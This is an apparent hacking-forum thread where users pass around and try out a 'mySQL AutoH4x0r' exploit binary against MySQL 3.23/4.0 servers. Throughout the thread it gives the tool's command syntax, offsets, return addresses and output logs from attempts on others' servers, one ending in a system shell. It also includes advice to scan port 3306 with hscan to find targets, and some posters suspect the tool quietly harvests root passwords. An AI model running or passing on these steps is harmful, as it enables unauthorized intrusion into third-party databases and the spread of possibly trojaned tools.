Hi found this on the web.... it's BETA 3 but may it works...

I'm on testing this.... habe fun !!!

C'ya
Steven ;=

good worl, thank you

can you give me/us the pw? thx

Nice one Steffan .
Didn't test it but what I wanted to say:

You forgot to upload cygwin1.dll .

I attached the file.

Greetings

you are a n********************************

nice work m8te thx for this one

how can i scan on them?

thanks dude gonna test it and see what i can found...

nice work man , i aint no haxor and i will never b one but thx for sharing .

@ lonely

Do a port scan on port 3306 (mysql standard port).
Then check list with hscan.
hf and gl

@ Steffan
big thx for sharing, will test my sql server @ home

hrhr to all nooobs who leech this (filtered) is a beta and it will never run so good how the final!

HRHR

thx for the file
this is good exploit ?

nice

gonna test it ... hope it works

Everytime i get this

mysqlroot32 -d **.***.**.* -p NULL -t 2 -a 0
[+]---------------------------------------------------------------
[+] mySQL 3.23.x/4.0.x AutoH4x0r V.1.5d BETA3 PoC
[+] by M@steR & Mantra, use requests.txt as shell-commands ;D
[+] check for further updates! report errors to Master1337@gmx.de
[+] DO NOT DISTRIBUTE !!! to (filtered) script kiddiez *GRRrr*
[+]---------------------------------------------------------------
[+] Running in Shell Mode happy typing
[+] Attacking: windows,using ret addr:0x77e7bec3,pad:72
[+] Connecting to mysql server **.***.**.*:3306....
[-] Error: Access denied for user: 'root@sutherland.securewebs.net' (Using passw
ord: YES)
0 [main] mysqlroot32 2416 handle_exceptions: Exception: STATUS_ACCESS_VIOL
ATION
266 [main] mysqlroot32 2416 open_stackdumpfile: Dumping stack trace to mysql
root32.exe.stackdump

Sorry but what is wrong?
i have tested:
mysqlroot32 -d **.***.**.* -p -t 2 -a 0
mysqlroot32 -d **.***.**.* -p -t 2 -a 0
mysqlroot32 -d **.***.**.* -t 2 -a 0
but nothing

DO NOT USE -p option if PW is NULL !!!

cause if U just type de .exe name it shows U that default is already NULL !!

they'll bring a new one soon out someone told me

C'ya
Steven

yes i have tested mysqlroot32 -d **.***.**.* -t 2 -a 0 too.
Okay one question how can i change the root-user?
if the user is admin and not root ?

Okay now anything happened

[+] Running in Shell Mode happy typing
[+] Attacking: windows,using ret addr:0x77e7bec3,pad:72
[+] Connecting to mysql server **.***.***.***:3306....
[+] switching to debug mode -> report errorz to Master1337@gmx.de
[+] OK. let's try to rootit
[+] ALTER user column...
[+] OK. select a valid User from Table
[+] OK. Found a valid User: nilsbyte
[+] Password length : 888
[+] Tyr to modify password....... ok
[+] Finding client socket......FAILED
[-] Cannot find client socket

why he found user: nilsbyte and not root?

no luck... i have tested 8 servers and always:

[+]---------------------------------------------------------------
[+] mySQL 3.23.x/4.0.x AutoH4x0r V.1.5d BETA3 PoC
[+] by M@steR & Mantra, use requests.txt as shell-commands ;D
[+] check for further updates! report errors to Master1337@gmx.de
[+] DO NOT DISTRIBUTE !!! to (filtered) script kiddiez *GRRrr*
[+]---------------------------------------------------------------
[+] Running in Shell Mode happy typing
[+] Attacking: windows,using ret addr:0x77e7bec3,pad:72
[+] Connecting to mysql server *.*.*.*:3306....
[+] switching to debug mode -> report errorz to Master1337@gmx.de
[+] OK. let's try to rootit
[+] ALTER user column...
[+] OK. select a valid User from Table
[+] OK. Found a valid User:
[+] Password length : 888
[+] Tyr to modify password....... ok
[+] Finding client socket......FAILED
[-] Cannot find client socket




FxF

how can I put the username?

and there is another thing it saying:

same too

[+]---------------------------------------------------------------
[+] mySQL 3.23.x/4.0.x AutoH4x0r V.1.5d BETA3 PoC
[+] by M@steR & Mantra, use requests.txt as shell-commands;D
[+] check for further updates! report errors to Master1337@gmx.de
[+] DO NOT DISTRIBUTE !!! to (filtered) script kiddiez *GRRrr*
[+]---------------------------------------------------------------
[+] Running in Shell Mode happy typing
[+] Attacking: linux,using ret addr:0x42125b2b,pad:152
[+] Connecting to mysql server xxx.xx.xx.xxx:3306....
[+] switching to debug mode -> report errorz to Master1337@gmx.de
[+] OK. let's try to rootit;)
[+] ALTER user column...
[+] OK. select a valid User from Table
[+] OK. Found a valid User:
[+] Password length : 528
[+] Tyr to modify password....... ok
[+] Finding client socket......FAILED
[-] Cannot find client socket


in my opinion, this one is just crap... it doesnt work..

but look this passage:
[+] ALTER user column...
[+] OK. select a valid User from Table
[+] OK. Found a valid User:
[+] Password length : 528

looks more than changing the root password... so the releaser of this one could eazy add the new password to his wordlist and he has more targets with his new password for root... you gonna help another one ? yes
2nd thing: a friend of mine told me, that he was able to see the source of this exploit -> it just changes the password

so you gonna secure mysql servers for an other one... thx guys

an other aspect: if you want to use a mysql exploit, than you need a buffer overflow, if theres a unknow bufferoverflow, this exploit wont get public... otherwise there would be more mysql exploits and the bug should be already fixed.

so my recommendation: don't use this exploit... anyone who uses it, makes all vuln mysql worthless... (you just help another phony guy )...

another thing: if you dont know how to scan mysql, you better dont try it (dangerous logs with your ip and private adress and the name of your younger sister

Basti, i'v used this xploit and no it doesnt work, but it doesnt change the pass either. Just try scanning the same ip again and you'll see, it still has the same pass.

thanks you for this sql tool....

Anyway, it won't work in Windows.

It's opinion security specialist after analize file ....

great tools, tks man!

Hey Steffan

Thanks Bro

Am Gonna Test This Will Let You Know M8

Best Regards

Adam

Vast Gsm Team

saw that on a IRC chat.....

[+]----------------------------------------------------------------------------
[+] mySQL 3.23.x/4.0.x AutoH4x0r V.2.0a BETA4 PoC
[+] NOTE !! Win32 only works on W2K/SP4! (chines/english) send me offsets pls.
[+] DO NOT DISTRIBUTE !!! Private 0-day Exploit !!
[+]----------------------------------------------------------------------------
[+] Usage:mysqltest -d <IP> -u <user> -p <pass> -t <OStype> -a <0/1/2)
[+] -d target host ip/name
[+] -u login user (default root)
[+] -p 'root' password (default NULL)
[+] -a <val> 0=spwan a shell, 1=Autoh4xor, 2=Mixed Mode [default 0]
[+] -t OStype [default:1]
[+] 1 [0x42125b2b]: Linux:glibc-2.2.93-5
[+] 2 [0x77e7bec3]: Windows2000 EN/SP4


[+]----------------------------------------------------------------------------
[+] mySQL 3.23.x/4.0.x AutoH4x0r V.2.0a BETA4 PoC
[+] NOTE !! Win32 only works on W2K/SP4! (chines/english) send me offsets pls.
[+] DO NOT DISTRIBUTE !!! Private 0-day Exploit !!
[+]----------------------------------------------------------------------------
[+] Running in Shell Mode
[+] Attacking: linux User: root password: (null)
[+] Connecting to mysql server xxxxxxxx:3306....
[+] server version: 4.0.15
[+] Connection info: xxxxxxxxxx via TCP/IP
[+] switching to debug mode -> report errors to Master1337@gmx.de
[+] OK. connected let's try to rootit
[+] ALTER user column...
[+] OK. select a valid User from Table
[+] OK. Found a valid User:
[+] Password length : 528
[+] Try to modify password....... ok
[+] Try to find client socket ...ok
[+] Overflow server (flushSQL)....ok
[+] sending OOB.......ok
[+] Connection to Shell pls. wait....
[+] Dropping to System Shell...

So they fixed the bug with the socket ?!
If someone find it on the NET please post it here I NEED THE NEW ONE !!!

THX.
Steven

dont work the exploit 100% sure about that

THAT'S RIGHT

what a pity....really doesnt work??well if you guys say that...then i believe you all!!

10x... although going to check it!

Thanks 4 The Effort Steffan

Tryed Tested Not Working

35544 [main] mysqlroot32 2548 handle_exceptions: Exception: STATUS_PRIVILEGED_
INSTRUCTION
50011 [main] mysqlroot32 2548 open_stackdumpfile: Dumping stack trace to mysql
root32.exe.stackdump

Best Regards

Adam

Vast Gsm Team

Thanx for it ! i will try it !

there is a new version out beta4 someone have it, i suppose this version will work correctly!

Can you post it over here please mate?

sorry i dont have it

Thanks..
I Would want to Mysql Autoh4x0r For Lin&win32...
That's Great..!!

where I can get thiss new beta?

yea this new beta sounds cool.

If someone has the Beta, he'll post it, stop asking for stuff, if they don't post, it means they don't want to for a reason or because they don't have it, plain and simple

yes i think the same